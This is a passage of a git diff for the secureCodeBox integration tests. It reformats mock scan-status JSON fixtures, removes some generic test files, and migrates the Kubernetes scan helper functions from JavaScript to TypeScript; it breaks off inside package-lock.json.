"http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=d09a78fe0e563ac70a75c908319085699894a9eca04d4a32d723862e748e9416", + "rawResultType": "nmap-xml", + "state": "Done" } } \ No newline at end of file diff --git a/tests/integration/__testFiles__/mockScanStatusResponse_Errored.json b/tests/integration/__testFiles__/mockScanStatusResponse_Errored.json index 8857e69529..bce8f2d594 100644 --- a/tests/integration/__testFiles__/mockScanStatusResponse_Errored.json +++ b/tests/integration/__testFiles__/mockScanStatusResponse_Errored.json @@ -1,82 +1,80 @@ { - "body": { - "apiVersion": "execution.securecodebox.io/v1", - "kind": "Scan", - "metadata": { - "creationTimestamp": "2024-01-16T14:45:28Z", - "finalizers": [ - "s3.storage.securecodebox.io" - ], - "generateName": "nmap-example-", - "generation": 2, - "managedFields": [ - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:metadata": { - "f:finalizers": { - ".": {}, - "v:\"s3.storage.securecodebox.io\"": {} - } - }, - "f:spec": { - "f:resources": {} + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "creationTimestamp": "2024-01-16T14:45:28Z", + "finalizers": [ + "s3.storage.securecodebox.io" + ], + "generateName": "nmap-example-", + "generation": 2, + "managedFields": [ + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:metadata": { + "f:finalizers": { + ".": {}, + "v:\"s3.storage.securecodebox.io\"": {} } }, - "manager": "manager", - "operation": "Update", - "time": "2024-01-16T14:45:28Z" + "f:spec": { + "f:resources": {} + } }, - { - "apiVersion": "execution.securecodebox.io/v1", - "fieldsType": "FieldsV1", - "fieldsV1": { - "f:status": { + "manager": "manager", + "operation": "Update", + "time": "2024-01-16T14:45:28Z" + }, + { + "apiVersion": "execution.securecodebox.io/v1", + "fieldsType": "FieldsV1", + "fieldsV1": { + "f:status": { + ".": {}, + "f:findingDownloadLink": {}, + "f:findingHeadLink": {}, + "f:findings": { ".": {}, - "f:findingDownloadLink": {}, - "f:findingHeadLink": {}, - "f:findings": { - ".": {}, - "f:severities": {} - }, - "f:rawResultDownloadLink": {}, - "f:rawResultFile": {}, - "f:rawResultHeadLink": {}, - "f:rawResultType": {}, - "f:state": {} - } - }, - "manager": "manager", - "operation": "Update", - "subresource": "status", - "time": "2024-01-16T14:45:28Z" - } - ], - "name": "nmap-example-c24gt", - "namespace": "integration-tests", - "resourceVersion": "2399", - "uid": "5d2ef0e2-ad11-4e58-80d0-5168a137da17" - }, - "spec": { - "parameters": [ - "-p80", - "old-wordpress.demo-targets.svc" - ], - "resourceMode": "namespaceLocal", - "resources": {}, - "scanType": "nmap" - }, - "status": { - "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5944f10813f6127d96a3889b06c8256765c3a739db1e23f650ee6ec9ed956b20", - "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=45833109b8ea8d43df51b535730aece4cec1dbf6557a12acd1b95cdbce1f221e", - "findings": {}, - "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=0a91e1756a42fa40ca9bf1bb448ec36c544dd5af4b76c8bc3e91debbb68e349e", - "rawResultFile": "nmap-result.xml", - "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=d09a78fe0e563ac70a75c908319085699894a9eca04d4a32d723862e748e9416", - "rawResultType": "nmap-xml", - "state": "Errored", - "errorDescription": "Mocked Error" - } + "f:severities": {} + }, + "f:rawResultDownloadLink": {}, + "f:rawResultFile": {}, + "f:rawResultHeadLink": {}, + "f:rawResultType": {}, + "f:state": {} + } + }, + "manager": "manager", + "operation": "Update", + "subresource": "status", + "time": "2024-01-16T14:45:28Z" + } + ], + "name": "nmap-example-c24gt", + "namespace": "integration-tests", + "resourceVersion": "2399", + "uid": "5d2ef0e2-ad11-4e58-80d0-5168a137da17" + }, + "spec": { + "parameters": [ + "-p80", + "old-wordpress.demo-targets.svc" + ], + "resourceMode": "namespaceLocal", + "resources": {}, + "scanType": "nmap" + }, + "status": { + "findingDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=5944f10813f6127d96a3889b06c8256765c3a739db1e23f650ee6ec9ed956b20", + "findingHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/findings.json?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=45833109b8ea8d43df51b535730aece4cec1dbf6557a12acd1b95cdbce1f221e", + "findings": {}, + "rawResultDownloadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=604800&X-Amz-SignedHeaders=host&X-Amz-Signature=0a91e1756a42fa40ca9bf1bb448ec36c544dd5af4b76c8bc3e91debbb68e349e", + "rawResultFile": "nmap-result.xml", + "rawResultHeadLink": "http://securecodebox-operator-minio.securecodebox-system.svc.cluster.local:9000/securecodebox/scan-c4c2b6ae-f8a1-474d-88ec-c739f6e55f56/nmap-result.xml?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=admin%2F20240116%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240116T160849Z&X-Amz-Expires=43200&X-Amz-SignedHeaders=host&X-Amz-Signature=d09a78fe0e563ac70a75c908319085699894a9eca04d4a32d723862e748e9416", + "rawResultType": "nmap-xml", + "state": "Errored", + "errorDescription": "Mocked Error" } } \ No newline at end of file diff --git a/tests/integration/generic/findings-validation.test.js b/tests/integration/generic/findings-validation.test.js deleted file mode 100644 index a27f04582b..0000000000 --- a/tests/integration/generic/findings-validation.test.js +++ /dev/null @@ -1,20 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); - -jest.retryTimes(3); - -test( - "Parser must fail on invalid findings", - async () => { - await expect( - // passing hello-world as args, as at least one parameter is required - scan("invalid-findings-test-scan", "test-scan", ["hello-world"], 90) - ).rejects.toThrow( - `Scan failed with description "Failed to run the Parser. This is likely a Bug, we would like to know about. Please open up a Issue on GitHub."` - ); - }, - 3 * 60 * 1000 -); diff --git a/tests/integration/generic/no-scan-definition-error.test.js b/tests/integration/generic/no-scan-definition-error.test.js deleted file mode 100644 index c24fd34687..0000000000 --- a/tests/integration/generic/no-scan-definition-error.test.js +++ /dev/null @@ -1,24 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); - -jest.retryTimes(3); - -test( - "scan without a matching ScanType should be marked as errored", - async () => { - await expect( - scan( - "scan-type-not-found", - "this-type-does-not-exists", - ["hello-world"], - 30 - ) - ).rejects.toThrow( - `Scan failed with description "Configured ScanType 'this-type-does-not-exists' not found in 'integration-tests' namespace. You'll likely need to deploy the ScanType."` - ); - }, - 1 * 60 * 1000 -); diff --git a/tests/integration/generic/read-only-hook.test.js b/tests/integration/generic/read-only-hook.test.js deleted file mode 100644 index 20f4ff9375..0000000000 --- a/tests/integration/generic/read-only-hook.test.js +++ /dev/null @@ -1,82 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); -const k8s = require("@kubernetes/client-node"); - -jest.retryTimes(3); - -test( - "should trigger a webhook", - async () => { - await scan("test-scan-read-only-hook", "test-scan", ["hello-world"], 90); - - const WEBHOOK = "http-webhook"; - const NAMESPACE = "integration-tests"; - - const kc = new k8s.KubeConfig(); - kc.loadFromDefault(); - - const k8sApi = kc.makeApiClient(k8s.CoreV1Api); - - function containsPod(item) { - return item.metadata.name.includes(WEBHOOK); - } - - let podName; - await k8sApi.listNamespacedPod(NAMESPACE, "true").then((res) => { - let podArray = res.body.items.filter(containsPod); - if (podArray.length === 0) { - throw new Error(`Did not find Pod for "${WEBHOOK}" Hook`); - } - - podName = podArray[0].metadata.name; - }); - - const containerName = WEBHOOK; - - const params = { - k8sApi, - podName, - namespace: NAMESPACE, - containerName, - }; - const result = await delayedRepeat(isHookTriggered, params, 1000, 10); - - expect(result).toBe(true); - }, - 3 * 60 * 1000 -); - -async function isHookTriggered(params) { - console.log("Fetch Container Logs..."); - let containerLog = await params.k8sApi.readNamespacedPodLog( - params.podName, - params.namespace, - params.containerName, - false - ); - return containerLog.body.includes("/hallo-welt"); -} - -const sleep = (durationInMs) => - new Promise((resolve) => setTimeout(resolve, durationInMs)); - -async function delayedRepeat( - fun, - functionParamObject, - intervalInMs, - maxRetries -) { - for (let i = 0; i < maxRetries; i++) { - const condition = await fun(functionParamObject); - if (condition) { - return condition; - } - - await sleep(intervalInMs); - } - - throw new Error("Reached max retries"); -} diff --git a/tests/integration/generic/read-write-hook.test.js b/tests/integration/generic/read-write-hook.test.js deleted file mode 100644 index 0529edb848..0000000000 --- a/tests/integration/generic/read-write-hook.test.js +++ /dev/null @@ -1,34 +0,0 @@ -// SPDX-FileCopyrightText: the secureCodeBox authors -// -// SPDX-License-Identifier: Apache-2.0 - -const { scan } = require("../helpers"); - -jest.retryTimes(3); - -test( - "localhost port scan should only find a host finding", - async () => { - const { categories, severities, count } = await scan( - "test-scan-read-write-hook", - "test-scan", - ["hello-world"], - 90 - ); - - expect(count).toBe(2); - expect(categories).toMatchInlineSnapshot(` - Object { - "Host": 1, - "Open Port": 1, - "fancy-category": 2, - } - `); - expect(severities).toMatchInlineSnapshot(` - Object { - "high": 2, - } - `); - }, - 3 * 60 * 1000 -); diff --git a/tests/integration/helpers.test.js b/tests/integration/helpers.test.js index cb70f51d8c..bc0142935a 100644 --- a/tests/integration/helpers.test.js +++ b/tests/integration/helpers.test.js @@ -2,7 +2,7 @@ // // SPDX-License-Identifier: Apache-2.0 -const {scan, cascadingScan} = require("./helpers"); +const { scan, cascadingScan } = require("./helpers"); jest.setTimeout(10 * 1000); @@ -27,18 +27,23 @@ describe("Kubernetes interaction tests", () => { beforeEach(() => { jest.clearAllMocks(); }); + describe("scan function", () => { it("should create a scan and return findings on successful completion", async () => { const mockScanCreationResponse = require("./__testFiles__/mockScanCreationResponse.json"); const mockScanStatusResponse = require("./__testFiles__/mockScanStatusResponse.json"); mockK8sCRDApi.createNamespacedCustomObject.mockResolvedValue( - mockScanCreationResponse + mockScanCreationResponse, ); mockK8sCRDApi.getNamespacedCustomObjectStatus.mockResolvedValue( - mockScanStatusResponse + mockScanStatusResponse, ); - const k8sApi = { k8sCRDApi:mockK8sCRDApi, k8sBatchApi:mockK8sBatchApi, k8sPodsApi:mockPodsApi } + const k8sApi = { + k8sCRDApi: mockK8sCRDApi, + k8sBatchApi: mockK8sBatchApi, + k8sPodsApi: mockPodsApi, + }; const findings = await scan( "nmap-example", @@ -48,13 +53,70 @@ describe("Kubernetes interaction tests", () => { [], [], [], - k8sApi + k8sApi, ); - expect(findings).toBeDefined(); - expect(findings).toMatchSnapshot(); - expect(mockK8sCRDApi.createNamespacedCustomObject).toMatchSnapshot(); - expect(mockK8sCRDApi.getNamespacedCustomObjectStatus).toMatchSnapshot(); + expect(findings).toMatchInlineSnapshot(` + { + "categories": { + "Vulnerability": 24, + }, + "count": 24, + "severities": { + "high": 24, + }, + } + `); + expect(mockK8sCRDApi.createNamespacedCustomObject.mock.calls) + .toMatchInlineSnapshot(` + [ + [ + { + "body": { + "apiVersion": "execution.securecodebox.io/v1", + "kind": "Scan", + "metadata": { + "generateName": "nmap-example-", + }, + "spec": { + "initContainers": [], + "parameters": [], + "scanType": "nmap", + "volumeMounts": [], + "volumes": [], + }, + }, + "group": "execution.securecodebox.io", + "namespace": "integration-tests", + "plural": "scans", + "version": "v1", + }, + ], + ] + `); + expect(mockK8sCRDApi.getNamespacedCustomObjectStatus.mock.calls) + .toMatchInlineSnapshot(` + [ + [ + { + "group": "execution.securecodebox.io", + "name": "nmap-example-pw8vt", + "namespace": "integration-tests", + "plural": "scans", + "version": "v1", + }, + ], + [ + { + "group": "execution.securecodebox.io", + "name": "nmap-example-pw8vt", + "namespace": "integration-tests", + "plural": "scans", + "version": "v1", + }, + ], + ] + `); }); it("should throw an error if the scan fails", async () => { @@ -67,35 +129,30 @@ describe("Kubernetes interaction tests", () => { const mockReadNamespacedPodLogResponse = require("./__testFiles__/mockReadNamespacedPodLogResponse.json"); mockK8sCRDApi.createNamespacedCustomObject.mockResolvedValue( - mockScanCreationResponse + mockScanCreationResponse, ); mockK8sCRDApi.getNamespacedCustomObjectStatus.mockResolvedValue( - mockScanStatusResponse_Errored + mockScanStatusResponse_Errored, ); mockK8sBatchApi.listNamespacedJob.mockResolvedValue( - mockListNamespacedJobResponse + mockListNamespacedJobResponse, ); mockPodsApi.listNamespacedPod.mockResolvedValue( - mockListNamespacedPodResponse + mockListNamespacedPodResponse, ); mockPodsApi.readNamespacedPodLog.mockResolvedValue( - mockReadNamespacedPodLogResponse + mockReadNamespacedPodLogResponse, ); + const k8sApi = { + k8sCRDApi: mockK8sCRDApi, + k8sBatchApi: mockK8sBatchApi, + k8sPodsApi: mockPodsApi, + }; - const k8sApi = { k8sCRDApi:mockK8sCRDApi, k8sBatchApi:mockK8sBatchApi, k8sPodsApi:mockPodsApi } - - return expect(scan( - "nmap-example", - "nmap", - [], - 180, - [], - [], - [], - k8sApi - )).rejects.toThrow('Scan failed with description "Mocked Error"'); - + return expect( + scan("nmap-example", "nmap", [], 180, [], [], [], k8sApi), + ).rejects.toThrow('Scan failed with description "Mocked Error"'); }); }); @@ -106,17 +163,21 @@ describe("Kubernetes interaction tests", () => { const mockListNamespacedCustomObjectResponse = require("./__testFiles__/mockCascadingListNamespacedCustomObject.json"); mockK8sCRDApi.createNamespacedCustomObject.mockResolvedValue( - mockScanCreationResponse + mockScanCreationResponse, ); mockK8sCRDApi.getNamespacedCustomObjectStatus.mockResolvedValue( - mockScanStatusResponse + mockScanStatusResponse, ); mockK8sCRDApi.listNamespacedCustomObject.mockResolvedValue( - mockListNamespacedCustomObjectResponse + mockListNamespacedCustomObjectResponse, ); - const k8sApi = { k8sCRDApi:mockK8sCRDApi, k8sBatchApi:mockK8sBatchApi, k8sPodsApi:mockPodsApi } + const k8sApi = { + k8sCRDApi: mockK8sCRDApi, + k8sBatchApi: mockK8sBatchApi, + k8sPodsApi: mockPodsApi, + }; const findings = await cascadingScan( "nmap-dummy-ssh", @@ -130,12 +191,22 @@ describe("Kubernetes interaction tests", () => { }, }, 180, - k8sApi + k8sApi, ); - expect(findings).toBeDefined(); - expect(findings).toMatchSnapshot(); + expect(findings).toMatchInlineSnapshot(` + { + "categories": { + "Discovered Credentials": 1, + }, + "count": 1, + "severities": { + "high": 1, + }, + } + `); }); + it("should throw an error if the scan fails", async () => { const mockScanCreationResponse = require("./__testFiles__/mockCascadingScanCreationResponse.json"); const mockScanStatusResponse_Errored = require("./__testFiles__/mockCascadingScanStatusResponse_Errored.json"); @@ -146,36 +217,42 @@ describe("Kubernetes interaction tests", () => { const mockReadNamespacedPodLogResponse = require("./__testFiles__/mockReadNamespacedPodLogResponse.json"); mockK8sCRDApi.createNamespacedCustomObject.mockResolvedValue( - mockScanCreationResponse + mockScanCreationResponse, ); mockK8sCRDApi.getNamespacedCustomObjectStatus.mockResolvedValue( - mockScanStatusResponse_Errored + mockScanStatusResponse_Errored, ); mockK8sBatchApi.listNamespacedJob.mockResolvedValue( - mockListNamespacedJobResponse + mockListNamespacedJobResponse, ); mockPodsApi.listNamespacedPod.mockResolvedValue( - mockListNamespacedPodResponse + mockListNamespacedPodResponse, ); mockPodsApi.readNamespacedPodLog.mockResolvedValue( - mockReadNamespacedPodLogResponse + mockReadNamespacedPodLogResponse, ); - const k8sApi = { k8sCRDApi:mockK8sCRDApi, k8sBatchApi:mockK8sBatchApi, k8sPodsApi:mockPodsApi } + const k8sApi = { + k8sCRDApi: mockK8sCRDApi, + k8sBatchApi: mockK8sBatchApi, + k8sPodsApi: mockPodsApi, + }; - return expect(cascadingScan( - "nmap-dummy-ssh", - "nmap", - ["-Pn", "-sV", "dummy-ssh.demo-targets.svc"], - { - nameCascade: "ncrack-ssh", - matchLabels: { - "securecodebox.io/invasive": "invasive", - "securecodebox.io/intensive": "high", + return expect( + cascadingScan( + "nmap-dummy-ssh", + "nmap", + ["-Pn", "-sV", "dummy-ssh.demo-targets.svc"], + { + nameCascade: "ncrack-ssh", + matchLabels: { + "securecodebox.io/invasive": "invasive", + "securecodebox.io/intensive": "high", + }, }, - }, - 180, - k8sApi - )).rejects.toThrow('Initial Scan failed with description "Mocked Error"'); + 180, + k8sApi, + ), + ).rejects.toThrow('Initial Scan failed with description "Mocked Error"'); }); }); }); diff --git a/tests/integration/helpers.js b/tests/integration/helpers.ts similarity index 62% rename from tests/integration/helpers.js rename to tests/integration/helpers.ts index 5eabca031c..e47cfd19ab 100644 --- a/tests/integration/helpers.js +++ b/tests/integration/helpers.ts @@ -2,22 +2,58 @@ // // SPDX-License-Identifier: Apache-2.0 -const k8s = require("@kubernetes/client-node"); - -const kc = new k8s.KubeConfig(); -kc.loadFromDefault(); +import { + KubeConfig, + CustomObjectsApi, + BatchV1Api, + CoreV1Api, + V1Volume, + V1VolumeMount, + V1Container, +} from "@kubernetes/client-node"; + +const kc = new KubeConfig(); + +// connect to localhost cluster forwarded via kubectl proxy to workaround auth issues in bun: https://github.com/oven-sh/bun/issues/7332 +kc.loadFromOptions({ + clusters: [ + { + name: "localhost", + cluster: { + server: "http://localhost:8001", + skipTLSVerify: true, // no tls on proxy + }, + }, + ], + users: [ + { + name: "default", + }, + ], + contexts: [ + { + name: "default", + context: { + cluster: "localhost", + user: "default", + namespace: "integration-tests", + }, + }, + ], + currentContext: "default", +}); -let k8sCRDApi, k8sBatchApi, k8sPodsApi; +let k8sCRDApi: CustomObjectsApi, k8sBatchApi: BatchV1Api, k8sPodsApi: CoreV1Api; -function getKubernetesAPIs() { +export function getKubernetesAPIs() { if (!k8sCRDApi) { - k8sCRDApi = kc.makeApiClient(k8s.CustomObjectsApi); + k8sCRDApi = kc.makeApiClient(CustomObjectsApi); } if (!k8sBatchApi) { - k8sBatchApi = kc.makeApiClient(k8s.BatchV1Api); + k8sBatchApi = kc.makeApiClient(BatchV1Api); } if (!k8sPodsApi) { - k8sPodsApi = kc.makeApiClient(k8s.CoreV1Api); + k8sPodsApi = kc.makeApiClient(CoreV1Api); } return { k8sCRDApi, k8sBatchApi, k8sPodsApi }; @@ -27,61 +63,54 @@ let namespace = "integration-tests"; const sleep = (ms) => new Promise((resolve) => setTimeout(resolve, ms * 1000)); async function deleteScan(name, k8sApis = getKubernetesAPIs()) { - await k8sApis.k8sCRDApi.deleteNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + await k8sApis.k8sCRDApi.deleteNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", + name: name, namespace, - "scans", - name, - {} - ); + }); } async function getScan(name, k8sApis = getKubernetesAPIs()) { - const { body: scan } = await k8sApis.k8sCRDApi.getNamespacedCustomObjectStatus( - "execution.securecodebox.io", - "v1", + return await k8sApis.k8sCRDApi.getNamespacedCustomObjectStatus({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", + name, namespace, - "scans", - name - ); - return scan; + }); } async function displayAllLogsForJob(jobName, k8sApis = getKubernetesAPIs()) { console.log(`Listing logs for Job '${jobName}':`); - const { - body: { items: pods }, - } = await k8sApis.k8sPodsApi.listNamespacedPod( + const pods = await k8sApis.k8sPodsApi.listNamespacedPod({ + labelSelector: `job-name=${jobName}`, namespace, - true, - undefined, - undefined, - undefined, - `job-name=${jobName}` - ); - - if (pods.length === 0) { + }); + + if (pods.items.length === 0) { console.log(`No Pods found for Job '${jobName}'`); } - for (const pod of pods) { + for (const pod of pods.items) { console.log( - `Listing logs for Job '${jobName}' > Pod '${pod.metadata.name}':` + `Listing logs for Job '${jobName}' > Pod '${pod.metadata?.name}':`, ); - for (const container of pod.spec.containers) { + for (const container of pod.spec?.containers || []) { try { - const response = await k8sApis.k8sPodsApi.readNamespacedPodLog( - pod.metadata.name, + if (!pod.metadata?.name) throw new Error("pod name is undefined"); + const logs = await k8sApis.k8sPodsApi.readNamespacedPodLog({ + name: pod.metadata.name, namespace, - container.name - ); + container: container.name, + }); console.log(`Container ${container.name}:`); - console.log(response.body); + console.log(logs); } catch (exception) { console.error( - `Failed to display logs of container ${container.name}: ${exception.body.message}` + `Failed to display logs of container ${container.name}: ${exception}`, ); } } @@ -90,17 +119,19 @@ async function displayAllLogsForJob(jobName, k8sApis = getKubernetesAPIs()) { async function logJobs(k8sApis = getKubernetesAPIs()) { try { - const { body: jobs } = await k8sApis.k8sBatchApi.listNamespacedJob(namespace); + const jobs = await k8sApis.k8sBatchApi.listNamespacedJob({ + namespace, + }); console.log("Logging spec & status of jobs in namespace"); for (const job of jobs.items) { - console.log(`Job: '${job.metadata.name}' Spec:`); + console.log(`Job: '${job.metadata?.name}' Spec:`); console.log(JSON.stringify(job.spec, null, 2)); - console.log(`Job: '${job.metadata.name}' Status:`); + console.log(`Job: '${job.metadata?.name}' Status:`); console.log(JSON.stringify(job.status, null, 2)); - await displayAllLogsForJob(job.metadata.name, k8sApis); + await displayAllLogsForJob(job.metadata?.name, k8sApis); } } catch (error) { console.error("Failed to list Jobs"); @@ -129,9 +160,17 @@ async function disasterRecovery(scanName, k8sApis) { * @param {PodsApi} PodsApi kubernetes api client for CoreV1Api. Optional, will be created if not provided. * @returns {scan.findings} returns findings { categories, severities, count } */ -async function scan(name, scanType, parameters = [], timeout = 180, volumes = [], volumeMounts = [], - initContainers = [], k8sApis = getKubernetesAPIs()) { - namespace = "integration-tests" +export async function scan( + name: string, + scanType: string, + parameters: string[] = [], + timeout: number = 180, + volumes: V1Volume[] = [], + volumeMounts: V1VolumeMount[] = [], + initContainers: V1Container[] = [], + k8sApis = getKubernetesAPIs(), +) { + namespace = "integration-tests"; const scanDefinition = { apiVersion: "execution.securecodebox.io/v1", kind: "Scan", @@ -147,15 +186,15 @@ async function scan(name, scanType, parameters = [], timeout = 180, volumes = [] initContainers, }, }; - const { body } = await k8sApis.k8sCRDApi.createNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + const scan = await k8sApis.k8sCRDApi.createNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", namespace, - "scans", - scanDefinition - ); + body: scanDefinition, + }); - const actualName = body.metadata.name; + const actualName = scan.metadata.name; for (let i = 0; i < timeout; i++) { await sleep(1); @@ -172,7 +211,7 @@ async function scan(name, scanType, parameters = [], timeout = 180, volumes = [] await disasterRecovery(actualName, k8sApis); throw new Error( - `Scan failed with description "${status.errorDescription}"` + `Scan failed with description "${status.errorDescription}"`, ); } } @@ -193,10 +232,17 @@ async function scan(name, scanType, parameters = [], timeout = 180, volumes = [] * @param {CRDApi} CRDApi kubernetes api client for CRDs. Optional, will be created if not provided. * @param {BatchApi} BatchApi kubernetes api client for BatchV1Api. Optional, will be created if not provided. * @param {PodsApi} PodsApi kubernetes api client for CoreV1Api. Optional, will be created if not provided. - * + * * @returns {scan.findings} returns findings { categories, severities, count } */ -async function cascadingScan(name, scanType, parameters = [], { nameCascade, matchLabels }, timeout = 180, k8sApis = getKubernetesAPIs()) { +export async function cascadingScan( + name, + scanType, + parameters = [], + { nameCascade, matchLabels }, + timeout = 180, + k8sApis = getKubernetesAPIs(), +) { const scanDefinition = { apiVersion: "execution.securecodebox.io/v1", kind: "Scan", @@ -209,19 +255,19 @@ async function cascadingScan(name, scanType, parameters = [], { nameCascade, mat parameters, cascades: { matchLabels, - } + }, }, }; - - const { body } = await k8sApis.k8sCRDApi.createNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + + const scan = await k8sApis.k8sCRDApi.createNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", namespace, - "scans", - scanDefinition - ); + body: scanDefinition, + }); - const actualName = body.metadata.name; + const actualName: string = scan.metadata.name; for (let i = 0; i < timeout; i++) { await sleep(1); @@ -230,54 +276,55 @@ async function cascadingScan(name, scanType, parameters = [], { nameCascade, mat if (status && status.state === "Done") { // Wait a couple seconds to give kubernetes more time to update the fields await sleep(5); - console.log("First Scan finished") - console.log(`First Scan Status: ${JSON.stringify(status, undefined, 2)}`) + console.log("First Scan finished"); + console.log(`First Scan Status: ${JSON.stringify(status, undefined, 2)}`); break; } else if (status && status.state === "Errored") { console.error("Scan Errored"); await disasterRecovery(actualName, k8sApis); throw new Error( - `Initial Scan failed with description "${status.errorDescription}"` + `Initial Scan failed with description "${status.errorDescription}"`, ); } - if (i === (timeout - 1)) { - throw new Error( - `Initial Scan timed out failed` - ); + if (i === timeout - 1) { + throw new Error(`Initial Scan timed out failed`); } } - const { body: scans } = await k8sApis.k8sCRDApi.listNamespacedCustomObject( - "execution.securecodebox.io", - "v1", + const scans = await k8sApis.k8sCRDApi.listNamespacedCustomObject({ + group: "execution.securecodebox.io", + version: "v1", + plural: "scans", namespace, - "scans" - ); - - let cascadedScan = null; - - for (const scan of scans.items) { - if (scan.metadata.annotations && scan.metadata.annotations["cascading.securecodebox.io/chain"] === nameCascade) { - cascadedScan = scan; - break; - } - } + }); + const cascadedScan = scans.items.find((scan) => { + return ( + scan.metadata.annotations && + scan.metadata.annotations["cascading.securecodebox.io/chain"] === + nameCascade + ); + }); if (cascadedScan === null) { - console.warn(`Didn't find matching cascaded scan in available scans: ${JSON.stringify(scans.items, undefined, 2)}`) - throw new Error(`Didn't find cascaded Scan for ${nameCascade}`) + console.warn( + `Didn't find matching cascaded scan in available scans: ${JSON.stringify(scans.items, undefined, 2)}`, + ); + throw new Error(`Didn't find cascaded Scan for ${nameCascade}`); } - const actualNameCascade = cascadedScan.metadata.name; + const actualNameCascade = cascadedScan.metadata?.name; for (let j = 0; j < timeout; j++) { - await sleep(1) + await sleep(1); const { status: statusCascade } = await getScan(actualNameCascade, k8sApis); if (statusCascade && statusCascade.state === "Done") { await sleep(2); - const { status: statusCascade } = await getScan(actualNameCascade, k8sApis); + const { status: statusCascade } = await getScan( + actualNameCascade, + k8sApis, + ); await deleteScan(actualName, k8sApis); await deleteScan(actualNameCascade, k8sApis); @@ -287,7 +334,7 @@ async function cascadingScan(name, scanType, parameters = [], { nameCascade, mat await disasterRecovery(actualName, k8sApis); await disasterRecovery(actualNameCascade, k8sApis); throw new Error( - `Cascade Scan failed with description "${statusCascade.errorDescription}"` + `Cascade Scan failed with description "${statusCascade.errorDescription}"`, ); } } @@ -297,6 +344,3 @@ async function cascadingScan(name, scanType, parameters = [], { nameCascade, mat throw new Error("timed out while waiting for scan results"); } - -module.exports.scan = scan; -module.exports.cascadingScan = cascadingScan; diff --git a/tests/integration/package-lock.json b/tests/integration/package-lock.json index 1a605ef79b..7f78a260f6 100644 --- a/tests/integration/package-lock.json +++ b/tests/integration/package-lock.json @@ -8,16 +8,13 @@ "name": "@securecodebox/integration-tests", "version": "1.0.0", "license": "Apache-2.0", - "dependencies": { - "@kubernetes/client-node": "^0.19.0", - "@types/jest": "^29.5.14", - "ts-jest": 